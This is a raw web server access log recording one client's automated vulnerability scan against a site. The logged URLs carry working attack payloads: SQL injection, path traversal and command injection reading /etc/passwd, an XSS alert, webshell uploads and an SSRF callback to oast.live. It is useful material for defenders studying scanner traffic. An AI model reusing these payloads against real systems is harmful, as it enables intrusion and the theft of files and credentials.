195.164.49.69 - - [20/Oct/2024:15:23:04 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:23:04 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:23:04 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:23:04 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:23:04 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:23:04 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:23:04 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:23:05 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:23:19 +0000] POST /webadmin/auth/verification.php HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:23:21 +0000] GET /?gf_page=upload HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:23:23 +0000] POST /?gf_page=upload HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:23:28 +0000] POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:23:29 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:23:31 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:23:33 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:23:35 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:23:37 +0000] POST /filemanager/upload.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:23:39 +0000] POST /web/google_analytics.php HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:23:41 +0000] POST /ws_utc/resources/setting/options HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:23:43 +0000] POST /ws_utc/resources/setting/keystore HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:23:47 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:23:52 +0000] GET /?pum_action=tools_page_tab_system_info HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:23:54 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:23:55 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:23:57 +0000] POST /adxmlrpc.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:23:59 +0000] GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:15:24:00 +0000] POST /photo/p/api/album.php HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:24:04 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:24:06 +0000] GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1 404 1140
195.164.49.69 - - [20/Oct/2024:15:24:08 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:24:10 +0000] POST /run HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:24:12 +0000] POST /forgot_password.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:24:14 +0000] POST /convert HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:24:16 +0000] GET /file/dAOJFF.txt HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:24:18 +0000] POST /auth/newpassword HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:24:20 +0000] POST /dfsms/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:24:22 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:15:24:24 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:15:24:26 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:15:24:28 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:24:30 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:24:32 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:15:24:34 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:24:36 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:24:38 +0000] POST /account/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:24:40 +0000] POST /opensis/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:24:42 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:24:44 +0000] POST /cgi-bin/libagent.cgi?type=J HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:24:46 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:24:48 +0000] GET /wp-admin/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:24:51 +0000] GET /?author=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:24:53 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:24:56 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:24:58 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:25:04 +0000] POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:25:06 +0000] GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:25:08 +0000] GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1 404 1150
195.164.49.69 - - [20/Oct/2024:15:25:33 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:25:34 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:25:34 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:25:34 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:25:34 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:25:34 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:25:35 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:25:35 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:25:35 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:25:35 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:25:35 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:25:35 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:25:35 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:25:36 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:25:40 +0000] POST /webtools/control/SOAPService HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:25:42 +0000] POST /RPC2_Login HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:25:44 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
83.212.98.101 - - [20/Oct/2024:15:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:25:46 +0000] POST /api/v1/login/oauth2/auth HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:25:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:25:52 +0000] PUT /cgi-bin/1ZNnya.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:25:54 +0000] DELETE /cgi-bin/1ZNnya.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:25:56 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:25:58 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:26:32 +0000] GET /modules/appagebuilder/config.xml HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:26:34 +0000] POST /modules/appagebuilder/apajax.php?rand=7884193544159 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:26:36 +0000] POST /modules/appagebuilder/apajax.php?rand=9178410076813 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:26:38 +0000] POST /modules/appagebuilder/apajax.php?rand=4621445185495 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:26:47 +0000] GET /vcac/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:26:49 +0000] GET /vcac/?original_uri=http://sdc.iopan.pl:80%2Fvcac HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:26:53 +0000] POST /admin/login.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:26:55 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:26:57 +0000] GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1 404 1153
195.164.49.69 - - [20/Oct/2024:15:27:01 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:27:11 +0000] POST /classes/Master.php?f=delete_item HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:27:13 +0000] GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:27:15 +0000] GET /ws-api/v2/users/me/details?token=02 HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:27:17 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:27:19 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:27:21 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:27:23 +0000] GET /index.php/user/ HTTP/1.1 404 1097
83.212.98.101 - - [20/Oct/2024:15:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:27:27 +0000] POST /json/setup-restore.action HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:27:29 +0000] GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:27:31 +0000] GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:27:35 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:27:37 +0000] POST /enrollment/ajax.php?action=login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:27:39 +0000] GET /enrollment/index.php?page=home HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:27:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:27:45 +0000] POST /jeecg-boot/jmreport/show HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:27:47 +0000] POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:15:27:49 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:15:27:53 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:15:27:55 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:15:27:57 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:27:59 +0000] POST /app/sys1.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:28:01 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:15:28:05 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:28:07 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:28:09 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:28:11 +0000] GET /api/login/unlockGetData HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:28:13 +0000] POST /api/login/ HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:28:17 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:28:19 +0000] POST /ajax/ticket_user_db.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:28:21 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:15:28:23 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:28:25 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:28:27 +0000] GET /streampipes-backend/api/v2/auth/settings HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:28:29 +0000] POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:28:31 +0000] GET /file=web_assets/../config.json HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:28:35 +0000] POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:15:28:37 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:28:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:28:41 +0000] POST /api/ HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:28:42 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:28:44 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:28:46 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
- - - [20/Oct/2024:15:28:50 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:28:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:28:54 +0000] GET /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:28:58 +0000] POST /webtools/control/view/StatsSinceStart HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:15:29:00 +0000] GET /asispanel/ HTTP/1.1 404 1088
- - - [20/Oct/2024:15:29:08 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:29:17 +0000] PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:29:19 +0000] POST /api/v0/train HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:29:21 +0000] GET /wp-json/wp/v2/give_forms/ HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:15:29:24 +0000] GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:15:29:25 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:29:27 +0000] POST /tracking/client_1/get-resource HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:29:29 +0000] POST /tracking/client_1/read-instruction HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:29:43 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:15:29:45 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:15:29:47 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:15:29:48 +0000] GET /interface-data/books-init HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:29:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:29:55 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:29:57 +0000] POST /index.php?action=porte_plume_previsu HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:29:59 +0000] GET /vicidial/welcome.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:30:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:30:03 +0000] POST /login/userverify.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:30:05 +0000] POST /auth/createAdmin HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:30:19 +0000] GET /RNhMNi HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:30:21 +0000] GET /heapdump HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:30:23 +0000] GET /actuator/heapdump HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:30:33 +0000] POST /dashboard/proc.php?type=login HTTP/1.1 404 1096
- - - [20/Oct/2024:15:30:39 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:30:41 +0000] POST /eps/api/resourceOperations/upload?token=3B284767A39CAAB0B27EC1F52FB56A1B HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:30:43 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:15:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:30:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:30:49 +0000] POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:30:51 +0000] POST /resource/help/sys/portal/dataxml.jsp HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:30:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:30:55 +0000] POST /ocpu/library/base/R/do.call/json HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:30:57 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:30:59 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:15:31:01 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:31:03 +0000] GET /cas/js/lib/buttons/zfKZz.jsp HTTP/1.1 404 1118
- - - [20/Oct/2024:15:31:05 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:31:07 +0000] GET /2nhukYBF7IjKjODdQTCxUvGPOlb.txt HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:31:09 +0000] GET /api/system/deviceinfo HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:31:13 +0000] POST /service_transport/service.action HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:31:15 +0000] GET /c1pLB.txt HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:31:17 +0000] POST /cgi-bin/Maintain/date_config HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:31:19 +0000] POST /login/userverify.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:31:21 +0000] POST /zms/admin/index.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:31:23 +0000] POST /modules/cartabandonmentpro/upload.php HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:31:25 +0000] GET /modules/cartabandonmentpro/uploads/bbbbbcc.php.png HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:15:31:27 +0000] POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/DXQVQx.jsp&fileId=2 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:31:29 +0000] GET /DXQVQx.jsp HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:31:30 +0000] POST /?s=index/index/index HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:31:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:31:36 +0000] GET /lcnuixs9mza.php HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:31:39 +0000] POST /client.do HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:31:41 +0000] POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:31:43 +0000] POST /aim/equipmap/accept.jsp HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:31:45 +0000] GET /2nhukdeMreTdTc5oYgQIszUS4I0.jsp HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:31:46 +0000] POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1 404 1093
83.212.98.101 - - [20/Oct/2024:15:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:32:42 +0000] GET /rest/users/1/settings/ HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:32:42 +0000] GET /wp-json/h5vp/v1/video/0?id='+union+all+select+concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5(999999999)),2,3,4,5,6,7,8--+- HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:32:44 +0000] GET /showfile.php?file=/etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:32:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:32:50 +0000] GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1099
- - - [20/Oct/2024:15:32:52 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:32:54 +0000] GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:32:56 +0000] GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:15:32:58 +0000] GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:15:33:02 +0000] GET /web_cste/cgi-bin/product.ini HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:33:06 +0000] GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:33:08 +0000] OPTIONS / HTTP/1.1 200 -
195.164.49.69 - - [20/Oct/2024:15:33:10 +0000] GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:33:12 +0000] GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:33:15 +0000] GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','999999999')),3,32)-- HTTP/1.1 404 1098
- - - [20/Oct/2024:15:33:16 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:33:18 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:33:20 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1 404 1104
- - - [20/Oct/2024:15:33:22 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:33:24 +0000] GET /inventory HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:33:26 +0000] GET /data/pbootcms.db HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:33:28 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:33:30 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:33:32 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:33:34 +0000] GET /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:33:36 +0000] GET /wp-admin/install.php?step=1 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:33:40 +0000] GET /tool/log/c.php?strip_slashes=printf&host=nl+c.php HTTP/1.1 404 1096
